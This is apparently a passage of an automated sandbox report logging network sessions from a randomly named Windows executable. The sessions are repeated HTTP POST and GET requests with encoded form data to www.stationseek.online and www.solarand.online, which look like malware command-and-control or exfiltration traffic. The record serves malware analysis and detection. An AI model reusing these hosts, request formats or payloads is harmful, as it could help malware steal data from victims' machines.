                                                                        31192.168.2.450034198.251.84.200805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:45.668402910 CET785OUTPOST /3qlo/ HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.stationseek.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.stationseek.online/3qlo/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 65 31 65 64 77 4e 61 68 69 52 61 58 63 6b 6d 6c 67 2f 66 4b 57 7a 2b 65 53 78 44 4f 34 74 34 76 78 52 4c 51 56 52 59 57 49 6c 42 6c 34 6d 34 37 51 6c 72 73 79 6b 61 32 74 73 6c 73 73 6a 45 75 62 72 46 70 7a 7a 59 34 6c 50 70 73 77 4e 46 74 4b 38 6f 55 65 37 78 69 73 73 73 54 31 66 62 77 53 6f 55 34 4f 4e 7a 2b 33 70 72 72 38 34 48 62 2f 76 38 57 68 6c 35 41 68 33 65 6a 69 6d 6f 49 6f 76 50 7a 59 35 36 68 42 43 4d 38 46 6b 39 53 4b 45 46 64 53 44 70 4c 63 75 6a 36 71 79 59 48 38 76 6b 52 77 47 5a 36 57 37 56 2b 4e 45 54 33 79 52 4f 7a 4d 57 72 2b 50 78 62 4f 70 73 61 66 46 67 3d 3d
                                                                        Data Ascii: 9B_ppt=e1edwNahiRaXckmlg/fKWz+eSxDO4t4vxRLQVRYWIlBl4m47Qlrsyka2tslssjEubrFpzzY4lPpswNFtK8oUe7xisssT1fbwSoU4ONz+3prr84Hb/v8Whl5Ah3ejimoIovPzY56hBCM8Fk9SKEFdSDpLcuj6qyYH8vkRwGZ6W7V+NET3yROzMWr+PxbOpsafFg==
                                                                        Dec 13, 2024 13:09:46.998615026 CET908INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:46 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.450035198.251.84.200805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:48.322998047 CET805OUTPOST /3qlo/ HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.stationseek.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.stationseek.online/3qlo/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 65 31 65 64 77 4e 61 68 69 52 61 58 64 46 32 6c 6c 59 7a 4b 43 6a 2b 64 57 42 44 4f 75 64 34 72 78 52 48 51 56 54 31 4a 4a 58 56 6c 34 44 38 37 42 51 48 73 78 6b 61 32 6d 4d 6c 70 69 44 45 31 62 72 4a 4c 7a 79 30 34 6c 4c 42 73 77 50 4e 74 4b 73 55 56 63 72 78 67 67 4d 73 72 78 66 62 77 53 6f 55 34 4f 4d 58 59 33 70 6a 72 38 49 33 62 2b 4c 6f 56 2f 31 35 44 70 58 65 6a 30 57 6f 4d 6f 76 50 42 59 34 6d 59 42 42 6b 38 46 67 74 53 4b 33 64 43 59 44 70 4a 59 75 6a 6b 36 6e 42 4d 32 61 46 48 78 41 4a 34 62 4a 74 64 46 69 65 74 6a 67 76 6b 65 57 50 4e 53 32 53 36 6b 76 6e 57 65 6b 4b 57 74 54 65 71 52 51 5a 47 55 47 70 44 66 4b 75 66 47 52 41 3d
                                                                        Data Ascii: 9B_ppt=e1edwNahiRaXdF2llYzKCj+dWBDOud4rxRHQVT1JJXVl4D87BQHsxka2mMlpiDE1brJLzy04lLBswPNtKsUVcrxggMsrxfbwSoU4OMXY3pjr8I3b+LoV/15DpXej0WoMovPBY4mYBBk8FgtSK3dCYDpJYujk6nBM2aFHxAJ4bJtdFietjgvkeWPNS2S6kvnWekKWtTeqRQZGUGpDfKufGRA=
                                                                        Dec 13, 2024 13:09:49.661906004 CET908INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:49 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.450036198.251.84.200805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:50.983047009 CET10887OUTPOST /3qlo/ HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.stationseek.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.stationseek.online/3qlo/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 65 31 65 64 77 4e 61 68 69 52 61 58 64 46 32 6c 6c 59 7a 4b 43 6a 2b 64 57 42 44 4f 75 64 34 72 78 52 48 51 56 54 31 4a 4a 58 4e 6c 34 31 41 37 54 48 54 73 77 6b 61 32 36 38 6c 6f 69 44 45 34 62 72 68 50 7a 7a 49 47 6c 4e 46 73 78 71 5a 74 61 50 4d 56 57 72 78 67 39 38 73 51 31 66 62 66 53 73 4a 78 4f 4e 6e 59 33 70 6a 72 38 4b 66 62 33 2f 38 56 39 31 35 41 68 33 65 2f 69 6d 70 72 6f 76 48 52 59 34 69 49 42 78 45 38 43 42 42 53 5a 31 46 43 55 44 70 58 56 4f 69 33 36 6e 46 44 32 65 74 39 78 41 56 57 62 4b 78 64 47 30 66 68 68 55 76 42 42 6d 62 41 4c 51 61 4e 67 76 62 73 65 45 57 4f 67 42 32 55 48 77 4a 66 5a 57 5a 4b 46 37 6d 6c 53 42 6f 50 52 6c 4e 64 71 62 37 58 4b 59 50 66 75 62 6a 74 52 6d 32 32 67 50 6a 36 67 2f 77 5a 51 61 35 6d 72 50 49 65 69 50 39 4d 6b 54 59 48 38 30 55 4a 43 45 4d 37 57 58 71 37 73 71 56 36 4a 31 32 71 57 34 73 73 57 6d 6c 63 4c 47 4e 78 47 66 47 30 43 79 5a 4d 72 48 2f 65 51 35 67 5a 4e 56 4d 32 79 50 54 35 4f 50 75 5a 69 4e 46 72 69 4f 36 2f 57 78 44 [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=e1edwNahiRaXdF2llYzKCj+dWBDOud4rxRHQVT1JJXNl41A7THTswka268loiDE4brhPzzIGlNFsxqZtaPMVWrxg98sQ1fbfSsJxONnY3pjr8Kfb3/8V915Ah3e/improvHRY4iIBxE8CBBSZ1FCUDpXVOi36nFD2et9xAVWbKxdG0fhhUvBBmbALQaNgvbseEWOgB2UHwJfZWZKF7mlSBoPRlNdqb7XKYPfubjtRm22gPj6g/wZQa5mrPIeiP9MkTYH80UJCEM7WXq7sqV6J12qW4ssWmlcLGNxGfG0CyZMrH/eQ5gZNVM2yPT5OPuZiNFriO6/WxDImk/o0TV18FNBsdT0CasuvJ+uE7HN+Q1nu/5EakccMjW8VeLwesjdGGxTLhgBgatyAl0X1i6b2hy4toMxCh8l0Ns0yD1iroImWRvpieWkotCn3ZfwY3uYKgXShBxavJRi6MjcWzjvczK4dg6VXYO55A6j1T47IjjdetJVe/TBFsf3YjMowA4uWS+8qt+ScleNFeWd1XiASBX/6zOvVEDiQM31eseRJgYiepadii6WYdSVedcz6c2xkulwb551J5Yv00sRSr3tZgHCOedUpDffgQLfj0z3GtoCFyF+talgBslMJnPIzsIfScrmWxd3ESsElXUDWEckVQ+OlpgT28MbpaRg4uSdLiu4lGZCqollyQOk0EVGNubPO9Sd+Dn2L8n4I+P3ELYBjztQYzxm0EQ/2TRuIvOjKzaaZ70inYv310ftnxjy/Rp5e0rMYUhPqGk1uqxGY/dC1UiFB1bpEvK5b/aQCNSDpzkndzyPmcruNIrXm/BkfUSzj5oKdlUnbsYrmaTGqVPV753aUkpw9mF4mNiunjvgAYKB1tufoYHUxBYZjIymeabvNEDp1tQxAfD4V4TO6vE3q88gknMkCy2X9HOByZWl5kJKFGCgqqf9qBK36gstVw/OdbnKwfXrfrT90fSTavwsgJ1puHTtLO2DduOaHutKZTa3E [TRUNCATED]
                                                                        Dec 13, 2024 13:09:52.307467937 CET908INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:52 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.450037198.251.84.200805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:53.647983074 CET517OUTGET /3qlo/?9B_ppt=T329z6mTpDO/RjmIsaX6GxS+fVaV1tgKwTndei0jE2s03jQmQlLR7HOZ8ZNHnRQMcrtNhio3hbZStuVrccVySYYypr0GxKLOZ6Y8dZz+3cHpxqLj7fYKvSQ=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:09:54.980513096 CET1056INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:54 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS+fVaV1tgKwTndei0jE2s03jQmQlLR7HOZ8ZNHnRQMcrtNhio3hbZStuVrccVySYYypr0GxKLOZ6Y8dZz+3cHpxqLj7fYKvSQ=&Sbv8I=RfPDYvIHtJXp8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.450038217.160.0.60805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:00.847841978 CET776OUTPOST /tycs/ HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.solarand.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.solarand.online/tycs/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 45 6c 6a 57 76 55 31 78 5a 6b 50 32 6b 4d 68 79 71 4a 41 72 6e 49 49 4b 65 30 49 76 45 4c 42 67 79 36 68 2f 64 42 66 49 30 68 6a 52 4f 63 67 2b 4f 2b 54 64 45 30 6b 51 6c 4f 66 71 71 54 5a 72 65 55 68 75 50 30 6d 78 37 35 79 67 2f 78 71 52 6e 57 58 2b 4e 41 6a 36 7a 75 37 53 70 4d 32 42 2b 4f 37 6a 55 30 52 31 2f 73 74 68 51 71 4d 6d 71 47 46 62 46 49 36 2f 36 45 30 2b 5a 73 67 42 49 68 37 73 6a 70 50 31 5a 36 57 49 7a 69 53 72 54 2b 58 52 6f 30 77 6f 57 61 54 62 4b 53 57 78 72 4c 39 71 62 56 4e 66 55 39 70 76 4a 54 35 56 6f 77 59 41 73 6d 61 70 69 31 49 79 61 46 2b 43 65 77 3d 3d
                                                                        Data Ascii: 9B_ppt=EljWvU1xZkP2kMhyqJArnIIKe0IvELBgy6h/dBfI0hjROcg+O+TdE0kQlOfqqTZreUhuP0mx75yg/xqRnWX+NAj6zu7SpM2B+O7jU0R1/sthQqMmqGFbFI6/6E0+ZsgBIh7sjpP1Z6WIziSrT+XRo0woWaTbKSWxrL9qbVNfU9pvJT5VowYAsmapi1IyaF+Cew==
                                                                        Dec 13, 2024 13:10:02.206742048 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:01 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                        Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                        Dec 13, 2024 13:10:02.206782103 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                        Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.450039217.160.0.60805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:03.508893967 CET796OUTPOST /tycs/ HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.solarand.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.solarand.online/tycs/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 45 6c 6a 57 76 55 31 78 5a 6b 50 32 6c 74 78 79 6f 71 6f 72 77 34 49 4c 51 55 49 76 4b 72 42 73 79 36 39 2f 64 41 61 58 30 7a 48 52 4f 35 45 2b 50 36 6e 64 48 30 6b 51 74 75 66 6a 6e 7a 5a 30 65 55 39 63 50 31 4b 78 37 35 32 67 2f 7a 79 52 6e 42 4c 78 4d 51 6a 38 2b 4f 37 63 6e 73 32 42 2b 4f 37 6a 55 30 56 54 2f 76 64 68 54 62 38 6d 34 7a 78 59 49 6f 36 2b 39 45 30 2b 49 38 67 46 49 68 37 61 6a 73 76 4c 5a 38 53 49 7a 6a 69 72 54 4b 4c 51 2f 6b 77 75 59 36 53 49 44 58 72 44 71 37 73 32 62 48 4e 6a 65 65 70 38 49 56 30 50 35 42 35 58 2b 6d 2b 61 2f 79 42 47 58 47 44 4c 46 30 6f 58 70 65 59 71 58 4f 4c 63 63 39 55 6d 66 59 4b 70 41 78 6f 3d
                                                                        Data Ascii: 9B_ppt=EljWvU1xZkP2ltxyoqorw4ILQUIvKrBsy69/dAaX0zHRO5E+P6ndH0kQtufjnzZ0eU9cP1Kx752g/zyRnBLxMQj8+O7cns2B+O7jU0VT/vdhTb8m4zxYIo6+9E0+I8gFIh7ajsvLZ8SIzjirTKLQ/kwuY6SIDXrDq7s2bHNjeep8IV0P5B5X+m+a/yBGXGDLF0oXpeYqXOLcc9UmfYKpAxo=
                                                                        Dec 13, 2024 13:10:04.777515888 CET1236INHTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:04 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
